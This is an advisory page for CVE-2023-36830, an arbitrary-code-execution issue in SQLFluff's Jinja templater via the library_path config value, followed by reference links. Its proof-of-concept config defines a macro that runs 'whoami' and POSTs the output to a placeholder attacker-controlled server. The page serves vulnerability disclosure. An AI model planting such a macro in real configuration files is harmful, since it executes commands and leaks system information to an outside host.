CVE-2023-36830: SQLFluff users with access to config file, using `libary_path` may call arbitrary python code
(updated )
In environments where untrusted users have access to the config files (e.g. .sqlfluff), there is a potential security vulnerability where those users could use the library_path config value to allow arbitrary python code to be executed via macros. Jinja macros are executed within a sandboxed environment but the following example shows how an external url might be called and used to reveal internal information to an external listener:
[sqlfluff:templater:jinja]
library_path = /usr/lib/python3.9/http
[sqlfluff:templater:jinja:macros]
a_macro_def = {{client.HTTPSConnection('<SOME_EXTERNAL_SERVER_YOU_CONTROL>').request('POST', '/', server.os.popen('whoami').read())}}
For many users who use SQLFluff in the context of an environment where all users already have fairly escalated privileges, this may not be an issue - however in larger user bases, or where SQLFluff is bundled into another tool where developers still wish to give users access to supply their on rule configuration, this may be an issue.
References
- github.com/advisories/GHSA-jqhc-m2j3-fjrx
- github.com/pypa/advisory-database/tree/main/vulns/sqlfluff/PYSEC-2023-111.yaml
- github.com/sqlfluff/sqlfluff
- github.com/sqlfluff/sqlfluff/commit/6cdc38d76bedab4801b035c04d3c2b3aea17de86
- github.com/sqlfluff/sqlfluff/releases/tag/2.1.2
- github.com/sqlfluff/sqlfluff/security/advisories/GHSA-jqhc-m2j3-fjrx
- nvd.nist.gov/vuln/detail/CVE-2023-36830
Detect and mitigate CVE-2023-36830 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →